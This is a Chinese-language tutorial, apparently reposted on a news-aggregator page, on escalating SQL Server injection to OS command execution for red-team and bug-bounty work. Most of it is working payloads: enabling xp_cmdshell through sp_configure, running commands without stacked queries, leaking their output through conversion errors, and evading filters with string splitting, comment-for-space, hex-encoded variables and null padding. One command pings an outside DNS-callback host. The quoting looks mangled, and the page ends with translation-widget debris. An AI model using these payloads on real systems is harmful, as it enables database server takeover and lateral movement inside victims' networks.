sql server注入rce实践环球热点

背景:在漏洞挖掘中，合理的利用sql注入，可以把注入转换成rce，使一个高危漏洞变成严重漏洞。在红蓝对抗中，利用注入rce，实现内网横向移动。笔者基于漏洞挖掘和红蓝对抗上遇到的sql server注入做了个sql server的rce实践总结。

(资料图片仅供参考)

1.如何判断sql server是否可以rce?

select user;

权限为dbo

确定当前用户是否为管理员:

SELECT IS_SRVROLEMEMBER("sysadmin")

只有是sysadmin组的sql server账号才能执行系统命令

2.sql server 命令执行 xp_cmdshell扩展

exec master..xp_cmdshell "ping a43bade1.ipv6.bypass.eu.org"

直接执行会报错，尝试开启xp_cmdshell:

在高版本的sql server中已经无法使用xp_cmdshell ，测试版本sql server2017.

详细介绍如下:https://stackoverflow.com/questions/59971345/cannot-enable-xp-cmdshell-on-sql-server-2017-express-on-linux

切换sql server为2008:

开启xp_cmdshell:

EXEC sp_configure "show advanced options", 1;RECONFIGURE;EXEC sp_configure "xp_cmdshell", 1;RECONFIGURE;

3.sql server特性:

数字+字符串，不会报错  sql server会认为id=1and 1=1 就是id=1和and 1=1，自动会做处理

4.变量声明特性 DECLARE

不需要set也能声明变量使用:

1> DECLARE @bc varchar (8000) = 0x6f72616e6765;2> select * from Inventory where name=@bc;3> go

bypass:允许空格脏数据

DECLARE @i varchar (8000) = 0x6f72616e67652020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202> select * from Inventory where name=@i;3> go

不影响执行，原因在于数据后面的空格会被处理掉:

1> select * from Inventory where name="orange";2> select * from Inventory where name="orange

完全不影响执行

数据前后支持填充00 bypass:

1> DECLARE @i varchar (8000) = 0x0000000000000000000000006f72616e67650000000000000000000000000000002> select * from Inventory where name=@i;3> go

不会影响数据正常执行

5.sql server不支持堆叠也可以rce:

支持查询显示的sql server注入，不支持堆叠也可以rce:

select * from student where name="test"INSERT temp_abcdzxc(data) EXEC master..xp_cmdshell "whoami" select "1"select * from student where name="test"INSERT temp_abcdzxc(data) EXECute master..xp_cmdshell "ipconfig"-- 123ipconfig内容很大，会自动分行:

使用execute bypass:

如果命令执行的语句包含空格，那么需要双引号包裹:execute("xp_cmdshell "nslookup baidu.com"")一些变形:支持换行空格填充execute("xp_c"+"md" +       "sh"+"ell"+" w"+"ho"+"ami")更大的变形bypass:execute("xp_c"+"md" +       "sh"+"ell"+"                        "+""nslookup baidu.com"")关键字检测的变形:execute("xp_c"+"md" +       "sh"+"ell"+"                        "+""nsl"+"ookup ba"+"idu.com"")执行图在下方:

6.实战利用不支持堆叠的情况下，可以进行报错注入回显条件:支持sql语句报错

以数字类型sql注入为例:

第一步创建sql:select * from student where id=1CREATE TABLE test_exec(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100))

第二步:

执行存储过程命令执行插入数据到相关列中:select * from student where id=1 INSERT into test_exec(data) execute("xp_cmdshell whoami")

第三步:

通过sql报错回显命令:select * from student where id=1 and 1=convert(int,(select data from test_exec where id=1))

成功执行命令

7.sql server不支持堆叠开启xp_cmdshell:

第一步:关闭xp_cmdshell:

RECONFIGURE;EXEC sp_configure "xp_cmdshell",0execute("xp_cmdshell "nslookup baidu.com"")

第二步:不支持堆叠的情况下启动xp_cmdshell:

以字符串注入为例子:

select * from student where name="ddd" execute("EXEC sp_configure "xp_cmdshell",1")select * from student where name="ddd" execute("RECONFIGURE")

再次执行命令,执行成功没用到分号:

方法2:使用exec执行存储过程用于过滤括号()的场景:

select * from student where name="ddd" exec  sp_configure xp_cmdshell,1select * from student where name="ddd" RECONFIGURE

成功执行命令

8.hw实战案例，过滤(),=,空格，进行盲注执行命令例子:

因为过滤了空格无法使用声明变量的方式执行命令select * from student where name="ddd"/**/exec/**/sp_configure/**/xp_cmdshell,1select * from student where name="ddd"/**/RECONFIGURE因为过滤空格，所以执行命令需要使用特殊办法规避空格execute("xp_cmdshell/**/"nslookup%CommonProgramFiles:~10,-18%baidu.com"")

9.关闭高级扩展不彻底导致的rce:

exec sp_configure  "show advanced options",0RECONFIGUREexec xp_cmdshell "whoami"

问题导致的原因:

10.判断是否支持声明变量的办法:

延迟2sselect * from student where name="ddd" declare @i varchar(3000)=0x77616974666F722064656C61792027303A303A3227 execute(@i)

如果支持执行命令:

玩法巨多，说一种bypass的:select * from student where name="ddd" declare @i varchar(3000)=0x6e736c6f6f6b75702062616964752e636f6d00000000exec-- 123xp_cmdshell@i

成功执行命令:

11.判断是否支持堆叠查询:

1.产生延迟select * from student where name="ddd";waitfor delay "0:0:2"-- 1232.返回200 和返回异常select * from student where name="ddd"select "1"select * from student where name="ddd"select EXP(111111)-- 123图在下方:

12.补充 []字符串:今早chybeta给我发了个文章，我补充下[]的内容:

使用[]字符串 bypass:

参考链接:https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/

TRANSLATE with xEnglishTRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster PortalBack

关键词：

Arabic	Hebrew	Polish
Bulgarian	Hindi	Portuguese
Catalan	Hmong Daw	Romanian
Chinese Simplified	Hungarian	Russian
Chinese Traditional	Indonesian	Slovak
Czech	Italian	Slovenian
Danish	Japanese	Spanish
Dutch	Klingon	Swedish
English	Korean	Thai
Estonian	Latvian	Turkish
Finnish	Lithuanian	Ukrainian
French	Malay	Urdu
German	Maltese	Vietnamese
Greek	Norwegian	Welsh
Haitian Creole	Persian